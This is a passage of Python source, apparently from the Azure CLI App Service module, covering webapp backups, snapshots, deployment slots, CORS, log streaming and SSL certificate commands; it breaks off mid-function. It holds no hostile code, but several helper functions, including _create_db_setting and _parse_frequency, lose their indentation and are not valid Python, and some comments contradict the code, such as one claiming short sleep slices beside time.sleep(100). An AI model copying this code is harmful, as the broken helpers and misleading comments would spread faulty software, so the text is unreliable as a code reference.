        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception: # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List all backups of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
                                   slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Create a one-off backup of a webapp (or slot) into the given storage container."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    # Strip a trailing '.zip' from the requested name -- presumably the service
    # appends the extension itself; TODO confirm against the backup API.
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = BackupRequest(backup_name=backup_name,
                            storage_account_url=storage_account_url, databases=databases)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the scheduled-backup configuration of a webapp (or slot).

    Arguments left as None fall back to the values in the existing backup
    configuration. If no configuration exists yet, the core scheduling
    arguments (--container-url, --frequency, --retention, --retain-one) must
    all be supplied.

    :raises CLIError: when no configuration exists and required arguments are
        missing, or when *frequency* cannot be parsed.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    if backup_name and backup_name.lower().endswith('.zip'):
        # Strip the extension -- presumably the service appends '.zip' itself;
        # TODO confirm against the backup API.
        backup_name = backup_name[:-4]
    if not backup_name:
        # Default name: <app>_<UTC timestamp to the minute>.
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except DefaultErrorResponseException:
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # The CLI passes the flag through as a string; normalize to bool here.
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    if configuration and configuration.databases:
        # Keep the previously configured database settings unless overridden.
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a webapp (or slot) from a previously created backup blob."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    # Backup blobs are zip archives; make sure the blob name carries the extension.
    blob_name = backup_name if backup_name.lower().endswith('.zip') else backup_name + '.zip'
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = RestoreRequest(storage_account_url=storage_account_url,
                             blob_name=blob_name, overwrite=overwrite,
                             site_name=target_name, databases=databases,
                             ignore_conflicting_host_names=ignore_hostname_conflict)
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List the restorable snapshots of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
                                   slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore an app (or slot) from a snapshot -- its own, or another app's
    when both --source-resource-group and --source-name are given."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    cross_app_args = [source_resource_group, source_name]
    if all(cross_app_args):
        # Restore from a source app into this (target) app.
        sub_id = get_subscription_id(cmd.cli_ctx)
        source_id = ("/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group +
                     "/providers/Microsoft.Web/sites/" + source_name)
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        source = SnapshotRecoverySource(id=source_id)
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
                                         recover_configuration=recover_config)
    elif any(cross_app_args):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    else:
        # Overwrite the app with its own snapshot.
        request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
    """Return the Azure location of the given resource group."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    return client.resource_groups.get(resource_group_name).location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
    """Return the locations where the 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    for resource_type in web_provider.resource_types:
        if resource_type.resource_type == 'deletedSites':
            return resource_type.locations
    return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Build the authenticated local-git clone URL from the app's SCM endpoint."""
    user = client.get_publishing_user()
    source_control = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    scm = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(scm.scheme, user.publishing_user_name, scm.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https URL of the app's Kudu/SCM site."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    scm_host = next((h for h in webapp.host_name_ssl_states or []
                     if h.host_type == HostType.repository), None)
    if scm_host is not None:
        return "https://{}".format(scm_host.name)
    # this should not happen, but throw anyway
    raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
    """Return the subscription-wide publishing user."""
    return web_client_factory(cmd.cli_ctx).get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    if password is None:
        # Prompt interactively; fail with a clear message when no TTY is attached.
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user = User(publishing_user_name=user_name)
    user.publishing_password = password
    return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the app's publishing credentials (resolving the SDK poller)."""
    poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'list_publishing_credentials', slot)
    return poller.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Fetch publish profiles; parsed dicts by default, raw XML when *xml* is True."""
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    full_xml = ''.join(chunk.decode() for chunk in content)
    if xml:
        return full_xml
    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    converted = []
    for profile in profiles:
        entry = {}
        for key in profile:
            # strip the leading '@' xmltodict put in for attributes
            entry[key.lstrip('@')] = profile[key]
        converted.append(entry)
    return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle the DOCKER_ENABLE_CI app setting and return the CI/CD webhook URL."""
    update_app_settings(cmd, resource_group_name, name, ["DOCKER_ENABLE_CI=" + enable], slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Return whether container CI is enabled and, if so, the docker webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        cd_settings['CI_CD_URL'] = (credentials.scm_uri + '/docker/hook') if credentials else ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the app's URL in the default browser, optionally streaming its logs."""
    open_page_in_browser(_get_url(cmd, resource_group_name, name, slot))
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Return the app's browse URL, preferring https when any hostname has SSL enabled."""
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    # enabled_host_names[0] is the custom domain when one is assigned
    host = site.enabled_host_names[0]
    has_ssl = any(h.ssl_state != SslState.disabled for h in site.host_name_ssl_states)
    return ('https' if has_ssl else 'http') + '://' + host
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure diagnostic logging for a webapp (or slot).

    Each argument left as None leaves the corresponding log category untouched
    in the resulting SiteLogsConfig.

    :raises CLIError: if the app does not exist.
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location
    application_logs = None
    if application_logging is not None:
        # Falsy toggle means disable; otherwise default the level to 'Error'.
        if not application_logging:
            level = 'Off'
        elif level is None:
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level=level)
        application_logs = ApplicationLogsConfig(file_system=fs_log)
    http_logs = None
    # Web-server and docker-container logging share the same HTTP-logs config.
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Return the diagnostic logs configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Fetch a deployment log from the Kudu/SCM site.

    With *deployment_id*, fetches that deployment's log; otherwise lists the
    deployments and fetches the log of the most recent one (by start_time).
    Returns the parsed JSON log, or [] when no deployment/log URL is found.

    :raises CLIError: when the SCM site answers with a non-200 status.
    """
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # No id given: list deployments and pick the newest one's log URL.
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))
        sorted_logs = sorted(
            response.json(),
            key=lambda x: x['start_time'],
            reverse=True
        )
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')
    if deployment_log_url:
        response = requests.get(deployment_log_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployment_log_url, response.status_code, response.reason))
        return response.json()
    return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List the deployment history of a web app (or slot) from the Kudu/SCM endpoint.

    :raises CLIError: when the SCM endpoint does not answer with HTTP 200.
    """
    import urllib3
    import requests

    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        # Bug fix: report the URL that was actually requested (the original printed the
        # bare scm_url), matching the message produced by show_deployment_log.
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable auto-swap on a deployment slot (default target 'production') or disable it."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
    """List deployment slots of a web app, exposing the bare slot name and its plan name."""
    client = web_client_factory(cmd.cli_ctx)
    result = list(client.web_apps.list_slots(resource_group_name, webapp))
    for s in result:
        # The service returns 'sitename/slotname'; keep only the slot part.
        s.name = s.name.rsplit('/', 1)[-1]
        setattr(s, 'app_service_plan', parse_resource_id(s.server_farm_id)['name'])
        del s.server_farm_id
    return result
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
    """Swap, preview-swap, or reset a slot swap; the target defaults to 'production'."""
    client = web_client_factory(cmd.cli_ctx)
    if action == 'swap':
        return client.web_apps.swap_slot_slot(resource_group_name, webapp,
                                              slot, (target_slot or 'production'), True)
    if action == 'preview':
        # Swap-with-preview: apply the target slot's settings onto the source slot.
        if target_slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                   webapp, slot, True)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                             slot, target_slot, True)
    # action == 'reset': we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete one deployment slot of a web app."""
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    web_client_factory(cmd.cli_ctx).web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Set routing-in-production rules; 'distribution' is a list of 'slot=percentage' strings."""
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # Slot host names follow the '<app>-<slot>.<domain suffix>' convention.
    host_prefix, host_suffix = site.default_host_name.split('.', 1)
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        rules.append(RampUpRule(action_host_name='{}-{}.{}'.format(host_prefix, slot, host_suffix),
                                reroute_percentage=float(percentage),
                                name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Return the current routing-in-production (ramp-up) rules of the app."""
    return get_site_configs(cmd, resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all routing-in-production rules by setting an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, distribution=[])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the app's CORS allow-list and return the updated CORS settings."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    updated = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return updated.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove the given origins from the CORS allow-list; with no origins, clear the whole list."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if not allowed_origins:
            configs.cors.allowed_origins = []
        else:
            remaining = [o for o in (configs.cors.allowed_origins or []) if o not in allowed_origins]
            configs.cors.allowed_origins = remaining
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Return the current CORS settings of the app (or slot)."""
    return get_site_configs(cmd, resource_group_name, name, slot).cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream live logs to stdout until the user interrupts with ctrl+c."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += '/' + provider.lstrip('/')
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    # Stream from a daemon thread; the main thread just sleeps in small slices
    # so that ctrl+c can stop the command.
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    while True:
        time.sleep(100)
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the zipped historical logs of a web app (or slot) to 'log_file'."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    dump_url = scm_url.rstrip('/') + '/dump'
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(dump_url, user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return the (username, password) publishing credentials of the app or slot."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
    creds = poller.result()
    return creds.publishing_user_name, creds.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """Fetch logs over HTTPS: download to 'log_file' when given, otherwise stream to stdout.

    :raises CLIError: when the server does not answer with HTTP 200.
    """
    import certifi
    import urllib3
    try:
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass

    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    try:
        if r.status != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                url, r.status, r.reason))
        if log_file:  # download logs
            with open(log_file, 'wb') as f:
                while True:
                    data = r.read(1024)
                    if not data:
                        break
                    f.write(data)
        else:  # streaming
            std_encoding = sys.stdout.encoding
            for chunk in r.stream():
                if chunk:
                    # Extra encode() and decode for stdout which does not surpport 'utf-8'
                    print(chunk.decode(encoding='utf-8', errors='replace')
                          .encode(std_encoding, errors='replace')
                          .decode(std_encoding, errors='replace'), end='')  # each line of log has CRLF.
    finally:
        # Bug fix: always return the connection to the pool. The original only released
        # it on the success path, leaking the pooled connection on HTTP errors or when
        # the transfer was interrupted by an exception.
        r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
    """Upload a .pfx certificate into the web app's resource group.

    The certificate resource is named from its thumbprint, hosting environment,
    location and resource group, so re-uploading the same cert is idempotent.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    # Bug fix: read the pfx with a context manager — the original opened the file
    # and never closed it, leaking the file handle.
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Decrypts the .pfx file and returns its SHA1 thumbprint without ':' separators. '''
    # Bug fix: read the pfx with a context manager — the original used
    # open(...).read() and never closed the file handle.
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List all certificates in the given resource group."""
    return web_client_factory(cmd.cli_ctx).certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the first certificate in the resource group whose thumbprint matches."""
    client = web_client_factory(cmd.cli_ctx)
    match = next((c for c in client.certificates.list_by_resource_group(resource_group_name)
                  if c.thumbprint == certificate_thumbprint), None)
    if match is None:
        raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
    return client.certificates.delete(resource_group_name, match.name)
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Import a certificate stored in Key Vault into the web app's resource group.

    'key_vault' may be either a vault name (resolved within the current
    subscription) or a full Key Vault resource ID.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = None
    if not is_valid_resource_id(key_vault):
        # Treat 'key_vault' as a plain vault name and resolve it within the current subscription.
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        key_vaults = kv_client.vaults.list_by_subscription()
        for kv in key_vaults:
            if key_vault == kv.name:
                kv_id = kv.id
                break
    else:
        kv_id = key_vault
    if kv_id is None:
        # Vault name was not found in this subscription: explain how to pass a full resource ID.
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
        # Best-effort permission check; the import proceeds anyway, so only warn.
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)
    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
    return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for a hostname already bound to the app."""
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))

    # Managed certificates require a paid plan tier.
    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() in ('FREE', 'SHARED'):
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')

    # The hostname must already be registered as a custom domain on the app (or slot).
    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name, slot_text))

    easy_cert_def = Certificate(location=webapp.location, canonical_name=hostname,
                                server_farm_id=webapp.server_farm_id, password='')
    return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
                                                certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
    """Best-effort check that the Microsoft.Azure.WebSites service principal has
    the Secret 'Get' permission on the vault.

    Returns False when the vault lives in a different subscription (cannot be
    checked) or when no matching access policy is found.
    """
    from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription = get_subscription_id(cmd.cli_ctx)
    # Cannot check if key vault is in another subscription
    if subscription != key_vault_subscription:
        return False
    kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
    vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # Check for Microsoft.Azure.WebSites app registration
